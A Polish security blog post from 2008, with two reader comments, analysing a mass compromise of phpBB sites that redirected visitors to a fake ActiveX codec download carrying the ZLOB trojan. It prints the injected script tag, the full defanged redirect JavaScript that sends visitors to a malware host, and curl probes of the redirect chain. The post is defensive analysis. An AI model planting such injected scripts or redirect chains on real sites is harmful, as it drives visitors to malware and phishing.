Czekałem, czekałem i się doczekałem. Ponad 500 000 podmienionych stron (czytaj pół miliona :), za pomocą ataku SQL injection w popularnym forum phpBB. Każdorazowo odwiedzając jedną z zarażonych stron, jesteśmy przekierowywani do treści próbującej wytłumaczyć nam, że z powodu błędu w obiekcie ActiveX, treść video nie zostanie wyświetlona i przesyłany jest do nas plik w celu usunięcia usterki. Niestety nie będzie nam dane obejrzeć film video, niezależnie jak bardzo byłby on ciekawy.
Przekierowywani jesteśmy za pomocą JavaScriptu:
<script src="hXXp://xprmn4u.info/f.js"></script>
(domeny mogą być różne) do pliku f.js o treści:
var r=document.referrer,u=document.URL,t="",q;
if(r.indexOf("google.")!=-1){t="q";se="google";}
if(r.indexOf("live.")!=-1){t="q";se="live";}
if(r.indexOf("msn.")!=-1){t="q";se="msn";}
if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}
if(r.indexOf("altavista.")!=-1){t="q";se="altavista";}
if(r.indexOf("aol.")!=-1){t="query";se="aol";}
if(r.indexOf("ask.")!=-1){t="q";se="ask";}
if(r.indexOf("eureka.com")!=-1){t="q";se="eureka.com";}
if(r.indexOf("lycos.com")!=-1){t="query";se="lycos";}
if(r.indexOf("hotbot.com")!=-1){t="MT";se="hotbot";}
if(r.indexOf("infoseek.com")!=-1){t="qt";se="infoseek.com";}
if(r.indexOf("webcrawler.")!=-1){t="searchText";se="webcrawler";}
if(r.indexOf("excite.")!=-1){t="search";se="excite";}
if(r.indexOf("netscape.com")!=-1){t="search";se="netscape";}
if(r.indexOf("mamma.com")!=-1){t="query";se="mamma";}
if(r.indexOf("alltheweb.com")!=-1){t="query";se="alltheweb.com";}
if(r.indexOf("northernlight.com")!=-1){t="qr";se="northernlight.com";}
if(r.indexOf("rambler.ru")!=-1){t="words";se="rambler.ru";}
if(r.indexOf("aport.ru")!=-1){t="r";se="aport.ru";}
if(r.indexOf("yandex.ru")!=-1){t="text";se="yandex.ru";}
if(r.indexOf("pingwin.ru")!=-1){t="searchword";se="pingwin.ru";}
if(r.indexOf("www.ru")!=-1){t="Str_Find";se="www.ru";}
if(r.indexOf("punto.ru")!=-1){t="text";se="punto.ru";}
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
{
window.location=("hXXp://free.hostpinoy.info/go.php?sid=1");
}
else{
window.location=("hXXp://free.hostpinoy.info/go.php?sid=1");
}
Zapewne w początkowej wersji możliwe były dwa warianty lecz na chwilę obecną zostajemy przekierowani (znów) do strony:
hXXp://free.hostpinoy.info/go.php?sid=1
gdzie za pomocą przekierowania (HTTP 302) jesteśmy przekierowani do (na przykład):
hXXp://porn-look.net/gina/303228289/1/player.php?m=bW92MS5hdmk=&id=4254
czyli strony zapraszającej do pobrania specjalnych plików :) Co ciekawe ostatnie przekierowanie sprawdza jaki typ przeglądarki posiadamy i w zależności od zastosowanych mechanizmów możemy zostać przekierowani na przykład na:
1)
curl -s -v hXXp://free.hostpinoy.info/go.php?sid=1 -A Opera
curl -s -v hXXp://free.hostpinoy.info/go.php?sid=1 -A Mozilla
hXXp://porn-look.net/gina/303228289/1/player.php?m=bW92MS5hdmk=&id=4254
2)
curl -s -v hXXp://free.hostpinoy.info/go.php?sid=1 -A wget
curl -s -v hXXp://free.hostpinoy.info/go.php?sid=1 -A Safari
hXXPp://byet.org/web/index.html
3)
curl -s -v hXXp://free.hostpinoy.info/go.php?sid=1 -A MSIE
hXXp://netfast.org/blog3/index.php
Sam plik binarny to około 250 KB prezentów. Co ciekawe na dzień dzisiejszy serwis www.virustotal.com wykrywa zagrożenie w 15 z 32 silników antywirusowych. Okazuje się, że marketingowe mrzonki o szybkich reakcjach firm antywirusowych na występujące zagrożenia, są jedynie zimnymi mrożonkami. Choć z drugiej strony prawie połowa firm rozpoznaje próbkę prawidłowo, co w mojej opinii jest szczerze mówiąc słabą liczbą. Oprócz klasycznego trojana ZLOB dostajemy podmoduł odpowiedzialny za zmianę wpisów DNS, który umożliwia łatwe przekierowanie użytkownika na fałszywą stronę w celu kradzieży jego danych (phishing). Trojan uruchamia swoje procesy o nazwach notepad.exe, calc.exe, freebsd.exe, network.exe, a także zakłada pliki o nazwach na przykład: linux, dcryptdll.dll
Zarażone strony to w większości nie zaktualizowane wersje phpBB. Cały atak odbył się w przeciągu 24 godzin co przy takiej ilości i stopni komplikacji oznacza, że zamieszane w całą akcję było więcej osób. Dość powiedzieć, że mamy do czynienia ze zorganizowaną grupą przestępczą :]
W zasadzie pozostaje oczekiwać na przebicie magicznej cyferki pół miliona, która na mnie w końcu zaczęła robić odpowiednie wrażenie. Być może przyjdzie kiedyś taki zły czas, że obudzimy się rano, wpiszemy adres dowolnej strony WWW i zostaniemy obdarowani prezentem jak z bajki. I znów na koniec biadolenie wciąż o tym samym: aktualizujmy system, aktualizujmy oprogramowanie, z którego korzystamy [w tym wypadku phpBB], aktualizujmy myślenie… i może przetrwamy…
2 komentarze do
20 maja, 2008 o godzinie 14:58
A gdzie informacja o wersji phpBB, która posiada buga? ;s
20 maja, 2008 o godzinie 15:15
Zostały wykorzystane wszelkie błędy znane dotychczas w poszczególnych wersjach phpBB. Wystarczy sprawdzić pod adresem:
http://secunia.com/search/?search=phpbb
Tak przynajmniej wstępnie zeznaje firma MicroTrend, która odkryła problem. Może po niewczasie okazać się, że jednak był to jakiś nowy rodzaj błędu.